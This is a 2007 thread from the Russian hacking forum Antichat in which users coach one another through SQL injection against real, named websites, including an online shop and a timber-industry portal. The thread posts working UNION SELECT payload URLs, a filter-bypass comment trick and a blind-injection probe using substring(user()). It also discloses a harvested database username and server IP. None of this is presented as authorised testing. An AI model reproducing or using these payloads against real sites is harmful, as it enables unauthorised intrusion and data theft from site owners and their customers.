Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   sql ХЕЛП (https://forum.antichat.xyz/showthread.php?t=51634)

rubik-nerubik 21.10.2007 17:21
sql ХЕЛП
 
Вообщем случайно ткнул и нашел баг, как обычно кавычкой

теперь вопрос как реализовать, я подставил одну кавыку мне ругалось типа как прально надо и показало друго продуктИД и я постоянно подставлял всё новый и новый ид с кавычкой, пока вообще не исчезла одна строка, теперь вопрос выдает это:

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2/*' at line 1 SQL query : select photoID, filesname, thumbnail, enlarged from SS_product_pictures where productID=5656\' union select 1,2/*
может кто подскажет как бороться? я в растеренности. как видим это шоп

guest3297 21.10.2007 17:27
Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.

groundhog 21.10.2007 17:35
Хоть бы ссылку дал...

gemaglabin 21.10.2007 17:36
Цитата:
where productID=5656\
Какая тут ковычка кэш ? пробуй -1 union select 1/*

Scipio 21.10.2007 17:37
Цитата:
Сообщение от [ cash ]
Значение обрамленно кавычкой, кавычки фильтруються, для того что бы создать правильный запрос тебе надо обойти фильтрацию что сделать думаю будет очень сложно если вообще возможно.
Дык вроде не обрамлено:
Код:
productID=5656\'
тут только его кавычка...

2rubik-nerubik просто не ставь кавычку и раскручивай скулю...

после = в запросе поставь:
Код:
-5656 union select 1,2,3,4/*
как я понял, в select там 4 поля

rubik-nerubik 21.10.2007 17:49
без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива?

количество столбцов неизвестно

blackybr 21.10.2007 17:51
суди о выводу ошибки. столбцов 4. давай сюда разберемся. если там mag quotes или addslashes и в запроск обрамление в "" то прийдетсо сложно =)
давай сюда

Scipio 21.10.2007 18:00
Цитата:
Сообщение от rubik-nerubik
без кавычки никак т.е. пробывал всё, ерроры выскакивают только с ней может есть алтернатива?

количество столбцов неизвестно
дык зачем тебе ерроры... сделай как я сказал и ищи на странице цифры 1,2,3 или 4 если нет этих цифр возможно это blind -inj вобщем без реального линка сложно тебе че нить сказать

Spyder 21.10.2007 18:04
ссылку в студию, вполне возможно что кэш прав, и составить новый запрос можно только закрыв предидущий кавычкой

guest3297 21.10.2007 18:04
Цитата:
union select 1,2/*'
гема прав посмотрел только начало ошибки. Смутила последнияя кавычка, а она еррор просто обрамляет.

EST a1ien 23.10.2007 14:50
Народ благо не создавать новых тем помогите со скулем
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

вот такой запрос непрокатывает( надоело поля подбирать да и неверю что их так много)
Цитата:
http://www.lesprom.ru/html/error.php3?-1'%20union%20select%20null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null/*
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

Scipio 23.10.2007 20:03
Цитата:
Сообщение от EST a1ien
http://www.lesprom.ru/html/error.php3?e404'/*
Немогу подобрать колонки может стото не так делаю( может просто mysql версии < 4.0

мускул действительно 3x в нем union select не катит
да и пробелы фильтруются

Код:
http://www.lesprom.ru/html/error.php3?e404'/*!30000asas/*

Цитата:
Сообщение от EST a1ien
А вот тут
http://www.lesprom.ru/members/azlist.php3?sort=clist&order=fullname/*
с ордером проблема помогите хотябы поля подобрать.

тут у меня не получилось провести инъекцию, хотя ошибка выдается, мож там фильтрация какая нить...

а насчет:
Цитата:
с ордером проблема помогите хотябы поля подобрать.
я вобще не понял о чем ты

rubik-nerubik 23.10.2007 20:15
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\

Scipio 23.10.2007 22:02
вобщем там mysql 4.1 user()-clubfotonet@81.177.16.192

Это все делается через подзапросы, но в другом параметре:
Код:
http://www.cddj.ru/index.php?productID=1312&picture_id=1420%20and%20substring(user(),25,1)=2/*
вобщем если выражение верное, то загружаются сразу много картинок, в противном случае картинки незагружаются...
версия 4.1 используй подзапросы

blackybr 23.10.2007 22:34
Цитата:
Сообщение от rubik-nerubik
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
в этом параметре да =)
на полный аудит сайта я не не подписывался =)

guest3297 24.10.2007 11:55
Цитата:
http://www.cddj.ru/index.php?productID=-6915+union+select+1,2,3,4/*
вот сайт, я давал кешу и блекберу, они развели руками или чем там )
кстати, кеш автор множества статей по скулю =\
Когда вас корректно посылают вы не понимаете?


Время: 20:52